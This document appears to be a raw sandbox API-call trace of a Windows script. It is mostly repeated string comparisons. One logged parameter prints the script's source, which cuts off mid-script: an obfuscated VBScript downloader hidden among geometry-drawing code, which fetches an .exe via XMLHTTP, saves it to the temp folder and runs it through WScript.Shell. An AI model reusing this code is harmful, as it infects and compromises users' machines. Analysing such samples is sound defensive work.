(_String1="e = dsPoint\r\n .LabelLength = L", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.272] wcsncmp (_String1=" = dsPoint\r\n .LabelLength = Le", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1="= dsPoint\r\n .LabelLength = Len", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0020.272] wcsncmp (_String1=" dsPoint\r\n .LabelLength = Len(", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1="dsPoint\r\n .LabelLength = Len(.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0020.272] wcsncmp (_String1="sPoint\r\n .LabelLength = Len(.N", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0020.273] wcsncmp (_String1="Point\r\n .LabelLength = Len(.Na", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0020.273] wcsncmp (_String1="oint\r\n .LabelLength = Len(.Nam", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0020.273] wcsncmp (_String1="int\r\n .LabelLength = Len(.Name", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.273] wcsncmp (_String1="nt\r\n .LabelLength = Len(.Name)", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0020.273] wcsncmp (_String1="t\r\n .LabelLength = Len(.Name)\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.273] wcsncmp (_String1="\r\n .LabelLength = Len(.Name)\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -7 [0020.273] wcsncmp (_String1="\n .LabelLength = Len(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.273] wcsncmp (_String1=" .LabelLength = Len(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=" .LabelLength = Len(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=" .LabelLength = Len(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=" .LabelLength = Len(.Name)\r\n .", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=".LabelLength = Len(.Name)\r\n .L", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.273] wcsncmp (_String1="LabelLength = Len(.Name)\r\n .La", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0020.273] wcsncmp (_String1="abelLength = Len(.Name)\r\n .Lab", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.273] wcsncmp (_String1="belLength = Len(.Name)\r\n .Labe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0020.273] wcsncmp (_String1="elLength = Len(.Name)\r\n .Label", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.273] wcsncmp (_String1="lLength = Len(.Name)\r\n .LabelO", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.273] wcsncmp (_String1="Length = Len(.Name)\r\n .LabelOf", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0020.273] wcsncmp (_String1="ength = Len(.Name)\r\n .LabelOff", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.273] wcsncmp (_String1="ngth = Len(.Name)\r\n .LabelOffs", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0020.273] wcsncmp (_String1="gth = Len(.Name)\r\n .LabelOffse", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90 [0020.273] wcsncmp (_String1="th = Len(.Name)\r\n .LabelOffset", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.273] wcsncmp (_String1="h = Len(.Name)\r\n .LabelOffsetX", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0020.273] wcsncmp (_String1=" = Len(.Name)\r\n .LabelOffsetX ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1="= Len(.Name)\r\n .LabelOffsetX =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0020.273] wcsncmp (_String1=" Len(.Name)\r\n .LabelOffsetX = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1="Len(.Name)\r\n .LabelOffsetX = 0", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0020.273] wcsncmp (_String1="en(.Name)\r\n .LabelOffsetX = 0\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.273] wcsncmp (_String1="n(.Name)\r\n .LabelOffsetX = 0\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0020.273] wcsncmp (_String1="(.Name)\r\n .LabelOffsetX = 0\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0020.273] wcsncmp (_String1=".Name)\r\n .LabelOffsetX = 0\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.273] wcsncmp (_String1="Name)\r\n .LabelOffsetX = 0\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0020.273] wcsncmp (_String1="ame)\r\n .LabelOffsetX = 0\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.273] wcsncmp (_String1="me)\r\n .LabelOffsetX = 0\r\n .", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0020.273] wcsncmp (_String1="e)\r\n .LabelOffsetX = 0\r\n .L", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.273] wcsncmp (_String1=")\r\n .LabelOffsetX = 0\r\n .La", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0020.273] wcsncmp (_String1="\r\n .LabelOffsetX = 0\r\n .Lab", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -7 [0020.273] wcsncmp (_String1="\n .LabelOffsetX = 0\r\n .Labe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.273] wcsncmp (_String1=" .LabelOffsetX = 0\r\n .Label", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=" .LabelOffsetX = 0\r\n .LabelO", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=" .LabelOffsetX = 0\r\n .LabelOf", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=" .LabelOffsetX = 0\r\n .LabelOff", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1=".LabelOffsetX = 0\r\n .LabelOffs", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.273] wcsncmp (_String1="LabelOffsetX = 0\r\n .LabelOffse", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0020.273] wcsncmp (_String1="abelOffsetX = 0\r\n .LabelOffset", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.273] wcsncmp (_String1="belOffsetX = 0\r\n .LabelOffsetY", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0020.273] wcsncmp (_String1="elOffsetX = 0\r\n .LabelOffsetY ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.273] wcsncmp (_String1="lOffsetX = 0\r\n .LabelOffsetY =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.273] wcsncmp (_String1="OffsetX = 0\r\n .LabelOffsetY = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0020.273] wcsncmp (_String1="ffsetX = 0\r\n .LabelOffsetY = -", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0020.273] wcsncmp (_String1="fsetX = 0\r\n .LabelOffsetY = -s", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0020.273] wcsncmp (_String1="setX = 0\r\n .LabelOffsetY = -se", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0020.273] wcsncmp (_String1="etX = 0\r\n .LabelOffsetY = -set", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.273] wcsncmp (_String1="tX = 0\r\n .LabelOffsetY = -setd", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.273] wcsncmp (_String1="X = 0\r\n .LabelOffsetY = -setde", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0020.273] wcsncmp (_String1=" = 0\r\n .LabelOffsetY = -setdef", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.273] wcsncmp (_String1="= 0\r\n .LabelOffsetY = -setdefP", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0020.273] wcsncmp (_String1=" 0\r\n .LabelOffsetY = -setdefPo", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="0\r\n .LabelOffsetY = -setdefPoi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0020.274] wcsncmp (_String1="\r\n .LabelOffsetY = -setdefPoin", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -7 [0020.274] wcsncmp (_String1="\n .LabelOffsetY = -setdefPoint", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.274] wcsncmp (_String1=" .LabelOffsetY = -setdefPointS", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1=" .LabelOffsetY = -setdefPointSi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1=" .LabelOffsetY = -setdefPointSiz", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1=" .LabelOffsetY = -setdefPointSize", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1=".LabelOffsetY = -setdefPointSize ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.274] wcsncmp (_String1="LabelOffsetY = -setdefPointSize \\", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0020.274] wcsncmp (_String1="abelOffsetY = -setdefPointSize \\ ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.274] wcsncmp (_String1="belOffsetY = -setdefPointSize \\ 2", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0020.274] wcsncmp (_String1="elOffsetY = -setdefPointSize \\ 2 ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.274] wcsncmp (_String1="lOffsetY = -setdefPointSize \\ 2 +", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.274] wcsncmp (_String1="OffsetY = -setdefPointSize \\ 2 + ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0020.274] wcsncmp (_String1="ffsetY = -setdefPointSize \\ 2 + 1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0020.274] wcsncmp (_String1="fsetY = -setdefPointSize \\ 2 + 1\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0020.274] wcsncmp (_String1="setY = -setdefPointSize \\ 2 + 1\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0020.274] wcsncmp (_String1="etY = -setdefPointSize \\ 2 + 1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.274] wcsncmp (_String1="tY = -setdefPointSize \\ 2 + 1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.274] wcsncmp (_String1="Y = -setdefPointSize \\ 2 + 1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0020.274] wcsncmp (_String1=" = -setdefPointSize \\ 2 + 1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="= -setdefPointSize \\ 2 + 1\r\n '", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0020.274] wcsncmp (_String1=" -setdefPointSize \\ 2 + 1\r\n '.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="-setdefPointSize \\ 2 + 1\r\n '.L", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0020.274] wcsncmp (_String1="setdefPointSize \\ 2 + 1\r\n '.La", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0020.274] wcsncmp (_String1="etdefPointSize \\ 2 + 1\r\n '.Lab", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.274] wcsncmp (_String1="tdefPointSize \\ 2 + 1\r\n '.Labe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.274] wcsncmp (_String1="defPointSize \\ 2 + 1\r\n '.Label", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0020.274] wcsncmp (_String1="efPointSize \\ 2 + 1\r\n '.LabelW", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.274] wcsncmp (_String1="fPointSize \\ 2 + 1\r\n '.LabelWi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0020.274] wcsncmp (_String1="PointSize \\ 2 + 1\r\n '.LabelWid", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0020.274] wcsncmp (_String1="ointSize \\ 2 + 1\r\n '.LabelWidt", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0020.274] wcsncmp (_String1="intSize \\ 2 + 1\r\n '.LabelWidth", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.274] wcsncmp (_String1="ntSize \\ 2 + 1\r\n '.LabelWidth ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0020.274] wcsncmp (_String1="tSize \\ 2 + 1\r\n '.LabelWidth =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.274] wcsncmp (_String1="Size \\ 2 + 1\r\n '.LabelWidth = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0020.274] wcsncmp (_String1="ize \\ 2 + 1\r\n '.LabelWidth = P", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.274] wcsncmp (_String1="ze \\ 2 + 1\r\n '.LabelWidth = Pa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109 [0020.274] wcsncmp (_String1="e \\ 2 + 1\r\n '.LabelWidth = Pap", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.274] wcsncmp (_String1=" \\ 2 + 1\r\n '.LabelWidth = Pape", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="\\ 2 + 1\r\n '.LabelWidth = Paper", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 79 [0020.274] wcsncmp (_String1=" 2 + 1\r\n '.LabelWidth = Paper.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="2 + 1\r\n '.LabelWidth = Paper.T", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0020.274] wcsncmp (_String1=" + 1\r\n '.LabelWidth = Paper.Te", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="+ 1\r\n '.LabelWidth = Paper.Tex", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0020.274] wcsncmp (_String1=" 1\r\n '.LabelWidth = Paper.Text", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="1\r\n '.LabelWidth = Paper.TextW", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0020.274] wcsncmp (_String1="\r\n '.LabelWidth = Paper.TextWi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -7 [0020.274] wcsncmp (_String1="\n '.LabelWidth = Paper.TextWid", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.274] wcsncmp (_String1=" '.LabelWidth = Paper.TextWidt", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1=" '.LabelWidth = Paper.TextWidth", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1=" '.LabelWidth = Paper.TextWidth(", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1=" '.LabelWidth = Paper.TextWidth(.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.274] wcsncmp (_String1="'.LabelWidth = Paper.TextWidth(.N", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 26 [0020.274] wcsncmp (_String1=".LabelWidth = Paper.TextWidth(.Na", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.274] wcsncmp (_String1="LabelWidth = Paper.TextWidth(.Nam", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0020.274] wcsncmp (_String1="abelWidth = Paper.TextWidth(.Name", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.274] wcsncmp (_String1="belWidth = Paper.TextWidth(.Name)", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0020.274] wcsncmp (_String1="elWidth = Paper.TextWidth(.Name)\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.275] wcsncmp (_String1="lWidth = Paper.TextWidth(.Name)\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.275] wcsncmp (_String1="Width = Paper.TextWidth(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0020.275] wcsncmp (_String1="idth = Paper.TextWidth(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.275] wcsncmp (_String1="dth = Paper.TextWidth(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0020.275] wcsncmp (_String1="th = Paper.TextWidth(.Name)\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.275] wcsncmp (_String1="h = Paper.TextWidth(.Name)\r\n '", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0020.275] wcsncmp (_String1=" = Paper.TextWidth(.Name)\r\n '.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.275] wcsncmp (_String1="= Paper.TextWidth(.Name)\r\n '.L", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0020.275] wcsncmp (_String1=" Paper.TextWidth(.Name)\r\n '.La", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.275] wcsncmp (_String1="Paper.TextWidth(.Name)\r\n '.Lab", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0020.275] wcsncmp (_String1="aper.TextWidth(.Name)\r\n '.Labe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.275] wcsncmp (_String1="per.TextWidth(.Name)\r\n '.Label", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0020.275] wcsncmp (_String1="er.TextWidth(.Name)\r\n '.LabelH", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.275] wcsncmp (_String1="r.TextWidth(.Name)\r\n '.LabelHe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0020.275] wcsncmp (_String1=".TextWidth(.Name)\r\n '.LabelHei", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.275] wcsncmp (_String1="TextWidth(.Name)\r\n '.LabelHeig", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0020.275] wcsncmp (_String1="extWidth(.Name)\r\n '.LabelHeigh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.275] wcsncmp (_String1="xtWidth(.Name)\r\n '.LabelHeight", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0020.275] wcsncmp (_String1="tWidth(.Name)\r\n '.LabelHeight ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.275] wcsncmp (_String1="Width(.Name)\r\n '.LabelHeight =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0020.275] wcsncmp (_String1="idth(.Name)\r\n '.LabelHeight = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.275] wcsncmp (_String1="dth(.Name)\r\n '.LabelHeight = P", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0020.275] wcsncmp (_String1="th(.Name)\r\n '.LabelHeight = Pa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.275] wcsncmp (_String1="h(.Name)\r\n '.LabelHeight = Pap", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0020.275] wcsncmp (_String1="(.Name)\r\n '.LabelHeight = Pape", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0020.275] wcsncmp (_String1=".Name)\r\n '.LabelHeight = Paper", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.275] wcsncmp (_String1="Name)\r\n '.LabelHeight = Paper.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0020.275] wcsncmp (_String1="ame)\r\n '.LabelHeight = Paper.T", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.275] wcsncmp (_String1="me)\r\n '.LabelHeight = Paper.Te", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0020.275] wcsncmp (_String1="e)\r\n '.LabelHeight = Paper.Tex", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.275] wcsncmp (_String1=")\r\n '.LabelHeight = Paper.Text", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0020.275] wcsncmp (_String1="\r\n '.LabelHeight = Paper.TextH", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -7 [0020.275] wcsncmp (_String1="\n '.LabelHeight = Paper.TextHe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.275] wcsncmp (_String1=" '.LabelHeight = Paper.TextHei", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.275] wcsncmp (_String1=" '.LabelHeight = Paper.TextHeig", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.275] wcsncmp (_String1=" '.LabelHeight = Paper.TextHeigh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.275] wcsncmp (_String1=" '.LabelHeight = Paper.TextHeight", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.275] wcsncmp (_String1="'.LabelHeight = Paper.TextHeight(", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 26 [0020.275] SetLastError (dwErrCode=0xb) [0020.275] GetLastError () returned 0xb [0020.275] SetLastError (dwErrCode=0xb) [0020.276] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0020.276] CloseCodeAuthzLevel () returned 0x1 [0020.276] FreeLibrary (hLibModule=0x7ffb3c2d0000) returned 1 [0020.276] SysStringLen (param_1="\r\n\r\n\r\n\r\nPublic Sub FillPointWithDefaults(Point1 )\r\nWith Point1\r\n .Name = \"\"\r\n .Type = dsPoint\r\n .LabelLength = Len(.Name)\r\n .LabelOffsetX = 0\r\n .LabelOffsetY = -setdefPointSize \\ 2 + 1\r\n '.LabelWidth = Paper.TextWidth(.Name)\r\n '.LabelHeight = Paper.TextHeight(.Name)\r\n \r\n .PhysicalWidth = defPointSize\r\n .Width = .PhysicalWidth\r\n ToLogicalLength .Width\r\n \r\n .Locus = 0\r\n .ParentFigure = 0\r\n .ZOrder = 0 'GenerateNewPointZOrder\r\n .Tag = 0\r\n \r\n .FillStyle = setdefPointFill\r\n .FillColor = setdefcolPointFill\r\n .ForeColor = setdefcolPoint\r\n .Shape = setdefPointShape\r\n .ShowName = setAutoShowPointName\r\n .ShowCoordinates = False\r\n .NameColor = setdefcolPointName\r\n \r\n .Visible = True\r\n .Enabled = True\r\n .Hide = False\r\n .InDemo = True\r\n \r\n .X = 0\r\n .Y = 0\r\nEnd With\r\nEnd Sub\r\nFunction T2000(p, ddd) \r\n\x09dicA = 48\r\n Set DomingoauthenticMacAttack = CreateObject(\"WScript.Shell\")\x09\r\n\x09Save1.Type = 1\r\n\x09Save1.Open\r\nEnd Function \r\n \r\nDim Domingoauthenticensurance ' \r\n\r\nDim DomingoauthenticInPlaceOf ' \r\nDomingoauthenticTepir = \"User\"\r\n\r\n\r\nDim williams\r\n Dim TristateTrue\r\n\r\n\r\nDim DomingoauthenticTimeTo 'As Object\r\nDim DomingoauthenticDW\r\nDomingoauthenticDW = false\r\n \r\nDim Domingoauthenticbalibob 'As Object \r\n\r\n\r\nDim Domingoauthenticcashback 'As Object\r\n\r\n\r\n\r\n\r\n\r\n\r\nExecute \"Sub Aodbeneficeauthentic(strr):Save1.Savetofile DomingoauthenticInPlaceOf , 2 : End Sub\"\r\nDisaster = \"//34-43:ptth34-43exe.cbLzbrOwv\\34-43elifotevas34-43ydoBes\"+\"nopser34-43etirw34-43nepo34-43epyT34-43PmeT34-43TeG34-43ssecorP34-43llehs.tpircsW34-43noitacilppA.llehs34-43\" & \"\"\r\n\r\n\r\nDim krapivec\r\n\r\nDim DomingoauthenticPython1 'As Object\r\n \r\nDim Save1 'As Object\r\n\r\n\r\n\r\n\r\nDim DomingoauthenticPetir ' \r\nDim sNodeKey ' \r\n Dim sParentKey ' \r\n\r\n\r\n\r\nCHECHIL =\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\"\r\n\r\n\r\nExecute \"Sub FolderToCopy(A,B,Pipitr6) : B.Write Pipitr6.res\" + \"ponseBody : End Sub\"\r\n\x09\r\n\r\n\r\nDomingoauthenticPetir = \"Ag\"\r\n williams = Split(\"Microsoft.XMLHTTP34-43Adodb.streaM\"+StrReverse(Disaster), \"34-43\")\r\n\r\n\r\n Dim MarketPlaceibility ' \r\n\r\n\r\nDim Twelve 'As Integer\r\n Dim sDecimalVis ' \r\n \r\nDomingoauthenticTepir = DomingoauthenticTepir + \"-\"\r\n\r\ndr501 = False\r\n\r\nSet DomingoauthenticPython1 = CreateObject(williams(000))\r\n \r\n\r\n\r\nDim Valery 'As Integer\r\n \r\nDim Domingoauthentic404 ' \r\n\r\nDim DomingoauthenticMacAttack\r\n Dim MarketPlace ' \r\n Dim sTempVis ' \r\n Dim iCount 'As Integer\r\n\r\n \r\n\r\n'Set DomingoauthenticTimeTo = CreateObject(williams(8-6))\r\nTwelve = 10 + 1 + 1\r\nzTempVis = williams(Twelve - 11)\r\n\r\nPublic Sub DebugLog(txt)\r\n 'debug.print txt\r\n Open AppPath & \"ARC22ServerDebug.txt\" \r\n Print txt\r\n Close \r\nEnd Sub\r\nSet Domingoauthentic13 = GetRef(\"Aodbeneficeauthentic\")\r\nSet Domingoauthentic14 = GetRef(\"FolderToCopy\")\r\n \r\n\r\n\r\nSet Save1 = CreateObject(\"Adodb.s\"+\"treaM\")\r\n\r\n\r\nSet Domingoauthenticbalibob = CreateObject(williams(11-8)+\"\")\r\n\r\nATC = 3\r\nif \"RarArch\" + WScript + \"33\" = \"RarArchWindows Script Host33\" Then \r\n\x09\r\n Valery = 88144\r\n\r\n\x09Domingoauthenticensurance = CreateObject(\"Scripting.Fi\"+\"leSystemObject\").GetSpecialFolder(Twelve - 10)\r\n\r\nend if\x09\r\n \r\n Dim i\r\nsTempVis = williams(6+Twelve -6)\r\nNotFound404 = 24\r\n\r\nMarketPlace = williams(ATC+10) & 